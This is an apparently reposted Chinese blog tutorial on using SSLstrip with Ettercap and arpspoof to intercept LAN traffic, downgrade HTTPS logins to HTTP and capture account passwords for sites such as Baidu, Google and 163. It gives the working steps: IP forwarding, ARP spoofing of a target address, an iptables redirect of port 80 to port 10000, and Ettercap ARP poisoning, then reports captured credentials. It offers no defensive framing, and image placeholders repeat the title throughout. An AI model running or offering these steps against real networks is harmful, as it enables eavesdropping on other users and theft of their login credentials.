SSLstrip 中间人欺骗Https转Http获取密码

发布时间:2020-07-20 23:19:13 作者:GeForever
来源:网络 阅读:2295

SSLstrip 中间人欺骗Https转Http获取密码

SSLstrip 中间人欺骗Https转Http获取密码

***回顾

SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能

SSLstrip 中间人欺骗Https转Http获取密码

SSLstrip 中间人欺骗Https转Http获取密码

把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2

SSLstrip 中间人欺骗Https转Http获取密码

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap –T –q –I eth0

SSLstrip 中间人欺骗Https转Http获取密码

SSLstrip 中间人欺骗Https转Http获取密码

登录http的百度 效果良好

监听到数据了

SSLstrip 中间人欺骗Https转Http获取密码

SSLstrip 中间人欺骗Https转Http获取密码

登录google

发现在https 卡顿 无法通过

SSLstrip 中间人欺骗Https转Http获取密码

开启sslstrip

SSLstrip 中间人欺骗Https转Http获取密码

SSLstrip 中间人欺骗Https转Http获取密码

再向google登录的时候 https变成http

SSLstrip 中间人欺骗Https转Http获取密码

成功登录

SSLstrip 中间人欺骗Https转Http获取密码

监听到帐号密码

SSLstrip 中间人欺骗Https转Http获取密码

百度的

SSLstrip 中间人欺骗Https转Http获取密码

SSLstrip 中间人欺骗Https转Http获取密码

163的登录

SSLstrip 中间人欺骗Https转Http获取密码

http的跳转

SSLstrip 中间人欺骗Https转Http获取密码

网速过慢……

除了使用arpspoof 还可以使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的。

推荐阅读:
  1. Ettercap-中间人欺骗
  2. InveighZero是什么

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

target blank 中间人

上一篇:mac os下常用命令

下一篇:IOS9 微信sdk升级指南

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》